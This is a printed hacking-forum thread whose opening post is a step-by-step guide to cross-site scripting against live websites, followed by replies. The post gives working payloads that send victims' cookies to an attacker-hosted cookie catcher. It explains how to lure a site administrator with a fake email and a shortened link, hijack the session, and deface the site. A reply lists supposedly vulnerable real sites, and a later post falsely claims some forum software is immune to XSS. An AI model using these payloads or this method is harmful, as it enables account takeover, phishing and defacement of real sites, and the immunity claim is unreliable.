Sinisterly
Complete XSS Tutorial - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Complete XSS Tutorial (/Thread-Complete-XSS-Tutorial)

Pages: 1 2 3 4 5 6 7

Complete XSS Tutorial - 1234hotmaster - 02-10-2011

Hi XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking Biggrin

First go to a free hosting site like www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/Tdbm


What does the cookie catcher do?
It grabs the user's:
  • Cookies
  • IP
  • Referral link which what page it got to that link
  • Time and Date



Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
http://adf.ly/Tdo3

Now for testing if a site is vuln or not you can add these codes:
Code:
"><script>alert(document.cookie)</script>
Code:
'><script>alert(document.cookie)</script>
Code:
"><script>alert("Test")</script>
Code:
'><script>alert("Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup like this:
Spoiler:
[Image: i83028_popup.bmp]

Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.

In the end, if your site is www.example.com the link to test it would be: www.example.com/index.php?id="><script>alert(document.cookie)</script>




Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: http://adf.ly/Tdo3
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:
Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you Smile

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
www.example.com/cookie catcher.php
the container of the cookies would be:
www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!
PS: the site i used doesn't support cookies so you can use: http://adf.ly/TeZV for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:
Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>
Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more Smile

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.



Non-Persistent XSS:

Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:
Code:
<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one:
http://hackcommunity.com/Thread-Anonymous-fake-mailer-any-any-to-any-any

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him Smile


Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:
Code:
Javascript:void(document.cookie="")
or for an example:
Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! your logged in as administrator Evil
So now go in your admin panel and upload your deface page.





Good luck now you hacked a site with XSS :thumbs:

This guide was written by 1234hotmaster and wasn't leeched from ANYWHERE else or copied. If you share this please give credits cause i spent alot of time writing this guide for you guys :innocent:

If you want to thank me you can +Rep me instead:
http://hackcommunity.com/reputation.php?uid=6&action=add

Have a nice day and if you have any questions or need help about XSS just [Image: postbit_pm.gif] me Smile





Note: This guide is for educational purposes only!!! else I'm not responsible of what action(s) you may do with this guide.


RE: Complete XSS Tutorial - 1llusion - 02-10-2011

Cool!!!! I do like it!!!!

Will you make a guide on xss defacing too? Tongue

RE: Complete XSS Tutorial - 1234hotmaster - 02-10-2011

glad you liked it Smile

sure i will Tongue

RE: Complete XSS Tutorial - Lenalee - 02-13-2011

err..a bit confusing on the "Get Vuln Site" The others i can understand.......:heh:

RE: Complete XSS Tutorial - Liyan Oz - 02-13-2011

i like it... i will post XSS next time

RE: Complete XSS Tutorial - V1P3R - 02-13-2011

Wooowwwww bro nice tutorial Biggrin
I lost my old xss tut and almost forgot it lolTongue
Wanna do a tut with me about lfi and rfi later on?

RE: Complete XSS Tutorial - 1234hotmaster - 02-13-2011

(02-13-2011, 12:43 AM)Lenalee Wrote: err..a bit confusing on the "Get Vuln Site" The others i can understand.......:heh:
well pm me if you need help. well a vuln site is a site like this one:
http://adf.ly/V3oQ

(02-13-2011, 03:04 AM)Liyan Wrote: i like it... i will post XSS next time
well, this IS a XSS guide :\


(02-13-2011, 10:13 AM)V1P3R Wrote: Wooowwwww bro nice tutorial Biggrin
I lost my old xss tut and almost forgot it lolTongue
Wanna do a tut with me about lfi and rfi later on?
sure! Smile



RE: Complete XSS Tutorial - V1P3R - 02-15-2011

(02-14-2011, 01:08 AM)Guest Wrote: i have always admired hacks and dreamed of being top notch, but never really did anything except study some .. new to this site but would love to learn.

begin by registering :thumbs:

RE: Complete XSS Tutorial - X Makube - 02-17-2011

great tutorial sir... It's easy to understand... thank you.

i share this some vulnerable sites:

Code:
http://www.corpwatch.org/article.php?id=13518"<h1>THIS IS INJECTED TEXT</h1>

http://www.humanevents.com/article.php?id=14965"<h1>THIS IS INJECTED TEXT</h1>

http://www.marshall.org/article.php?id=264"<h1>THIS IS INJECTED TEXT</h1>

http://www.americas-society.org/article.php?id=1409"<h1>THIS IS INJECTED TEXT</h1> Still epic... xD

http://convivea.com/download.php?id=2"<h1>THIS IS INJECTED TEXT</h1>

http://www.urusoft.net/download.php?id=sw"<h1>THIS IS INJECTED TEXT</h1>


RE: Complete XSS Tutorial - 1234hotmaster - 03-23-2011

And i forgot to say, VBulletin, MyBB and Wordpress forums are invulnerable to both XSS and SQLI. ofc wordpress was once vuln but they fixed it Smile

@Guest
don't waste your time Smile